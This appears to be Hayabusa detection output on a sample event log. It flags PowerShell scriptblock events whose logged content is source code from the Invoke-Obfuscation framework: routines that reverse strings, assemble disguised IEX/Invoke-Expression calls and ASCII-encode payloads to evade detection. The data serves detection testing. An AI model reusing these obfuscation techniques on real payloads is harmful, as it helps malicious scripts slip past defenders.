""[$ArrayStr]::$ReverseStr("" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ';' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 3 { # 3) -Join[Regex]::Matches($String,'.','RightToLeft') # Randomly choose to use 'RightToLeft' or concatenated version of this string in $JoinOptions below. If(Get-Random -Input (0..1)) { $RightToLeft = Out-ConcatenatedString $RightToLeftStr ""'"" } Else { $RightToLeft = ""'$RightToLeftStr'"" } # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]::$JoinStr("" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + "".$ValueStr"" + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $ScriptString = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } default {Write-Error ""An invalid value was passed to switch block.""; Exit;} } # Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed. # E.g. ""testin`G"" in reverse would be ""G`nitset"" where `n would be interpreted as a newline character. $SpecialCharacters = @('a','b','f','n','r','t','v','0') ForEach($SpecialChar in $SpecialCharacters) { If($ScriptString.Contains(""``""+$SpecialChar)) { $ScriptString = $ScriptString.Replace(""``""+$SpecialChar,$SpecialChar) } } Return $ScriptString } Function Out-EncapsulatedInvokeExpression { <# .SYNOPSIS HELPER FUNCTION :: Generates random syntax for invoking input PowerShell command. Invoke-Obfuscation Function: Out-EncapsulatedInvokeExpression Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncapsulatedInvokeExpression generates random syntax for invoking input PowerShell command. It uses a combination of IEX and Invoke-Expression as well as ordering (IEX $Command , $Command | IEX). .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-EncapsulatedInvokeExpression {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green|Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # The below code block is copy/pasted into almost every encoding function so they can maintain zero dependencies and work on their own (I admit using this bad coding practice). # Changes to below InvokeExpressionSyntax block should also be copied to those functions. # Generate random invoke operation syntax. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = Out-RandomCase $InvokeExpression # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $ScriptString = (Get-Random -Input $InvokeOptions) Return $ScriptString }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.250 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"omCase (Get-Random -Input @('ForEach-Object','ForEach','%')) # Select random method for building command to reverse the now-reversed $ScriptString to execute the original command. Switch(Get-Random -Input (1..3)) { 1 { # 1) $StringVar = $String; $StringVar[-1..-($StringVar.Length)] -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,('""' + ' '*(Get-Random -Input @(0,1)) + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $RandomVarGet = $RandomVarGet + '[' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '..' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + "".$LengthStr"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ']' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $RandomVarGet) + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 2 { # 2) $StringVar = [Char[]]$String; [Array]::Reverse($StringVar); $StringVar -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,(""[$CharStr["" + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $ScriptString = $ScriptString + ' '*(Get-Random -Input @(0,1)) + ""[$ArrayStr]::$ReverseStr("" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ';' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 3 { # 3) -Join[Regex]::Matches($String,'.','RightToLeft') # Randomly choose to use 'RightToLeft' or concatenated version of this string in $JoinOptions below. If(Get-Random -Input (0..1)) { $RightToLeft = Out-ConcatenatedString $RightToLeftStr ""'"" } Else { $RightToLeft = ""'$RightToLeftStr'"" } # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]::$JoinStr("" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + "".$ValueStr"" + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $ScriptString = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } default {Write-Error ""An invalid value was passed to switch block.""; Exit;} } # Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed. # E.g. ""testin`G"" in reverse would be ""G`nitset"" where `n would be interpreted as a newline character. $SpecialCharacters = @('a','b','f','n','r','t','v','0') ForEach($SpecialChar in $SpecialCharacters) { If($ScriptString.Contains(""``""+$SpecialChar)) { $ScriptString = $ScriptString.Replace(""``""+$SpecialChar,$SpecialChar) } } Return $ScriptString } Function Out-EncapsulatedInvokeExpression { <# .SYNOPSIS HELPER FUNCTION :: Generates random syntax for invoking input PowerShell command. Invoke-Obfuscation Function: Out-EncapsulatedInvokeExpression Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncapsulatedInvokeExpression generates random syntax for invoking input PowerShell command. It uses a combination of IEX and Invoke-Expression as well as ordering (IEX $Command , $Command | IEX). .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-EncapsulatedInvokeExpression {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green|Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # The below code block is copy/pasted into almost every encoding function so they can maintain zero dependencies and work on their own (I admit using this bad coding practice). # Changes to below InvokeExpressionSyntax block should also be copied to those functions. # Generate random invoke operation syntax. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = Out-RandomCase $InvokeExpression # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $ScriptString = (Get-Random -Input $InvokeOptions) Return $ScriptString }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.254 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedAsciiCommand { <# .SYNOPSIS Generates ASCII encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedAsciiCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedAsciiCommand encodes an input PowerShell scriptblock or path as an ASCII payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIntera -NoProf ""Invoke-Expression( ('87K114r105E116_101i45K72P111a115_116a32E39E72E101E108a108!111a32K87K111t114_108_100o33P39r32o45!70o111t114r101E103K114i111o117K110t100K67o111K108K111_114_32_71t114K101_101P110!59t32P87a114t105K116P101a45K72E111i115_116t32E39r79E98E102o117a115K99a97!116P105E111_110o32E82_111a99P107K115r33K39P32t45K70!111!114P101E103E114r111t117r110r100r67E111_108a111a114P32_71a114_101!101a110'-SplIt'_' -SPLit'a' -SPlIt'o' -SPlIt 'K' -SplIT 'P'-SPLit'r' -SPlIt 'E'-SPLiT '!'-SpLIt'i'-SPlIT 't'|ForEach-Object { ([Char][Int]$_)} )-Join '') "" C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join ((87 , 114 , 105 , 116, 101 , 45,72,111 ,115 ,116, 32 , 39 , 72 ,101 ,108 ,108, 111 , 32, 87 , 111, 114 ,108, 100, 33, 39,32 , 45, 70,111, 114, 101 ,103,114 , 111 ,117 ,110, 100 ,67, 111,108,111 ,114 ,32 ,71,114 , 101 ,101 ,110 , 59, 32, 87, 114, 105,116, 101 ,45 , 72, 111 , 115 , 116, 32 , 39 ,79, 98 ,102, 117,115 , 99 , 97, 116, 105 ,111, 110,32 , 82 , 111 , 99 ,107, 115 ,33 , 39, 32,45, 70, 111 , 114 ,101,103, 114, 111,117 , 110 , 100 , 67 , 111,108,111, 114, 32, 71, 114, 101 , 101, 110 ) | %{ ( [Int]$_ -AS [Char])} )|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] 